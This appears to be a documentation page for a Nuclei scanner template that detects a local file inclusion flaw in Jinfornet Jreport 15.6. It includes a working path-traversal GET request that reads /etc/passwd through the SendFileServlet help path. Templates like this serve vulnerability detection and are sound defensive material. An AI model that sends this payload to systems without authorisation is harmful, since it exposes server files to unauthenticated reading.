Skip to content

Jinfornet Jreport 15.6 - Local File Inclusion

ID: jinfornet-jreport-lfi

Severity: high

Author: 0x_Akoko

Tags: jreport,jinfornet,lfi

Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.

id: jinfornet-jreport-lfi
info:
name: Jinfornet Jreport 15.6 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
reference:
- https://cxsecurity.com/issue/WLB-2020030151
- https://www.jinfonet.com/product/download-jreport/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: jreport,jinfornet,lfi
http:
- method: GET
path:
- "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4b0a00483046022100e12433cd503ffa550907943028962f2e7e08e7d92518513339fee8ac259ddf05022100860e7e5f1357855f9548d96b287df616acd8e9f3ed4f5dc7a2651ab8ff5e61d1:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/jinfornet-jreport-lfi.yaml"

View on Github